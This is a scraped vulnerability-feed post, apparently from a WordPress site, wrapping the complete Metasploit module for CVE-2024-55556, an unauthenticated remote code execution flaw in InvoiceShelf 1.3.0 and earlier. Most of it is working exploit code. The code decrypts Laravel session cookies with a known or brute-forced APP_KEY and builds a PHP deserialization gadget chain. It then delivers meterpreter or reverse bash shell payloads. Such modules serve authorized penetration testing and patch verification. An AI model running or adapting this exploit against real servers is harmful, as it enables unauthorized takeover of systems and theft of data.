{“lastseen”:”2025-08-29T19:24:15″,”description”:”InvoiceShelf is an open-source web \\u0026amp; mobile app that helps you track expenses, payments, create professional invoices \\u0026amp; estimates and is…”,”published”:”2025-08-29T18:53:33″,”modified”:”2025-03-14T18:51:09″,”type”:”metasploit”,”title”:”InvoiceShelf unauthenticated PHP Deserialization Vulnerability”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-INVOICESHELF_UNAUTH_RCE_CVE_2024_55556-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-55556″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::LaravelCryptoKiller\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘InvoiceShelf unauthenticated PHP Deserialization Vulnerability’,\\n ‘Description’ =\\u003e %q{\\n InvoiceShelf is an open-source web \\u0026 mobile app that helps you track expenses, payments, create professional\\n invoices \\u0026 estimates and is based on the PHP framework Laravel.\\n InvoiceShelf has a Remote Code Execution vulnerability that allows remote unauthenticated attackers to conduct\\n PHP deserialization attacks. This is possible when the `SESSION_DRIVER=cookie` option is set on the default\\n InvoiceShelf .env file meaning that any session will be stored as a ciphered value inside a cookie.\\n These sessions are made from a specially crafted JSON containing serialized data which is then ciphered using\\n Laravel’s encrypt() function.\\n An attacker in possession of the `APP_KEY` would therefore be able to retrieve the cookie, uncipher it and modify\\n the serialized data in order to get arbitrary deserialization on the affected server, allowing them to achieve\\n remote command execution. InvoiceShelf version `1.3.0` and lower is vulnerable.\\n As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,\\n potentially resulting in complete system compromise, data exfiltration, or unauthorized access\\n to sensitive information.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die-gr3y \\u003ch00die.gr3y[at]gmail.com\\u003e’, # MSF module contributor\\n ‘R\u00e9mi Matasse’, # SynActiv Research Team – discovery of the vulnerability\\n ‘Micka\u00ebl Benassouli’ # SynActiv Research Team – discovery of the vulnerability\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-55556’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/25C8UQRPhx\/cve-2024-55556’],\\n [‘URL’, ‘https:\/\/www.synacktiv.com\/advisories\/crater-invoice-unauthenticated-remote-command-execution-when-appkey-known’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2024-12-13’,\\n ‘Platform’ =\\u003e [‘php’, ‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_PHP, ARCH_CMD],\\n ‘Privileged’ =\\u003e false,\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP’,\\n {\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Type’ =\\u003e :php,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’\\n }\\n }\\n ],\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e false,\\n ‘RPORT’ =\\u003e 90\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [ true, ‘The InvoiceShelf endpoint URL.’, ‘\/’ ]),\\n OptString.new(‘APP_KEY’, [ true, ‘Laravel APP_KEY.’, ‘base64:kgk\/4DW1vEVy7aEvet5FPp5un6PIGe\/so8H0mvoUtW0=’]),\\n OptPath.new(‘BRUTEFORCE’, [false, ‘File with a list of APP_KEYs, one per line for a bruteforce attack.’, nil])\\n ])\\n end\\n\\n def execute_command(laravel_cookie_cipher, laravel_cookie, laravel_session_cookie, _opts = {})\\n laravel_cookie_id = laravel_cookie.split(‘=’)[0]\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘login’),\\n ‘cookie’ =\\u003e \\”#{laravel_session_cookie}; #{laravel_cookie_id}=#{laravel_cookie_cipher};\\”,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’\\n })\\n end\\n\\n def check\\n print_status(\\”Checking if #{peer} can be exploited.\\”)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘v1’, ‘app’, ‘version’)\\n })\\n return CheckCode::Unknown(‘No valid response received from target.’) unless res\\u0026.code == 200\\n\\n # check if target is running the InvoiceShelf platform\\n # parse json response and get the version\\n res_json = res.get_json_document\\n version_number = res_json[‘version’] unless res_json.blank?\\n return CheckCode::Safe(‘No InvoiceShelf platform found.’) if version_number.nil?\\n\\n if Rex::Version.new(version_number) \\u003c= Rex::Version.new(‘1.3.0’)\\n return CheckCode::Appears(\\”InvoiceShelf #{version_number}\\”)\\n end\\n\\n CheckCode::Safe(\\”InvoiceShelf #{version_number}\\”)\\n end\\n\\n def exploit\\n # lets first check if decryption is successful with the APP_KEY by decrypting the Laravel cookie.\\n # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier\\n cipher_mode = ‘AES-256-CBC’\\n res = send_request_cgi!({\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘login’)\\n })\\n fail_with(Failure::Unknown, ‘No valid response received from target.’) unless res\\u0026.code == 200\\n\\n print_status(‘Lets check if the APP_KEY(s) is\/are valid by decrypting the cookie.’)\\n print_status(‘Grabbing the cookies.’)\\n set_cookie = res.get_cookies\\n fail_with(Failure::NotFound, ‘No cookie found.’) if set_cookie.nil?\\n laravel_session_cookie = set_cookie.match(\/laravel_session=([^;]+)\/) # get laravel_session cookie\\n laravel_cookie = set_cookie.match(\/\\\\w{40}=([^;]+)\/) # search for the 40 alphanumeric cookie identifier\\n fail_with(Failure::NotFound, ‘No cookie found. Unable to check APP_KEY.’) if laravel_session_cookie.nil? || laravel_cookie.nil?\\n\\n if datastore[‘BRUTEFORCE’]\\n key_file = datastore[‘BRUTEFORCE’]\\n print_status(\\”Starting bruteforce decryption with APP_KEYS listed in #{key_file}.\\”)\\n result = laravel_bruteforce_from_file(laravel_cookie[1], key_file, cipher_mode)\\n fail_with(Failure::NotFound, \\”Bruteforce decryption failed. No valid APP_KEY found in file #{key_file}.\\”) if result.nil?\\n valid_app_key = result[‘key’]\\n unciphered_value = result[‘value’]\\n else\\n result = laravel_decrypt(laravel_cookie[1], datastore[‘APP_KEY’], cipher_mode)\\n fail_with(Failure::BadConfig, \\”Decryption with APP_KEY: #{datastore[‘APP_KEY’]} failed.\\”) if result.nil?\\n valid_app_key = datastore[‘APP_KEY’]\\n unciphered_value = result\\n end\\n print_good(\\”APP_KEY is valid: #{valid_app_key}\\”)\\n print_good(\\”Unciphered value: #{unciphered_value}\\”)\\n\\n print_status(‘Generate an encrypted serialized cookie payload with our cracked APP_KEY.’)\\n pl = payload.encoded\\n pl = \\”echo -n ‘#{Base64.strict_encode64(payload.encoded)}’|(base64 -d||openssl enc -base64 -d)|php\\” if target[‘Type’] == :php\\n pl_len = pl.length\\n laravel_payload = %(a:2:{i:7;O:40:\\”Illuminate\\\\\\\\Broadcasting\\\\\\\\PendingBroadcast\\”:1:{s:9:\\”\\\\x00*\\\\x00events\\”;O:35:\\”Illuminate\\\\\\\\Database\\\\\\\\DatabaseManager\\”:2:{s:6:\\”\\\\x00*\\\\x00app\\”;a:1:{s:6:\\”config\\”;a:2:{s:16:\\”database.default\\”;s:6:\\”system\\”;s:20:\\”database.connections\\”;a:1:{s:6:\\”system\\”;a:1:{i:0;s:#{pl_len}:\\”#{pl}\\”;}}}}s:13:\\”\\\\x00*\\\\x00extensions\\”;a:1:{s:6:\\”system\\”;s:12:\\”array_filter\\”;}}}i:7;i:7;})\\n b64_laravel_payload = Base64.strict_encode64(laravel_payload)\\n hash_value = unciphered_value.split(‘|’)[0]\\n laravel_cookie_cipher = laravel_encrypt_session_cookie(b64_laravel_payload, hash_value, valid_app_key, cipher_mode)\\n fail_with(Failure::BadConfig, ‘Laravel cookie encryption failed.’) if laravel_cookie_cipher.nil?\\n\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n execute_command(laravel_cookie_cipher, laravel_cookie[0], laravel_session_cookie[0])\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/invoiceshelf_unauth_rce_cve_2024_55556.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/invoiceshelf_unauth_rce_cve_2024_55556\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:24:15″,”description”:”InvoiceShelf is an open-source web \\u0026amp; mobile app that helps you track expenses, payments, create professional invoices \\u0026amp; estimates and is…”,”published”:”2025-08-29T18:53:33″,”modified”:”2025-03-14T18:51:09″,”type”:”metasploit”,”title”:”InvoiceShelf unauthenticated PHP Deserialization Vulnerability”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-INVOICESHELF_UNAUTH_RCE_CVE_2024_55556-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-55556″],”sourceData”:”##\\n#…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-15140","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n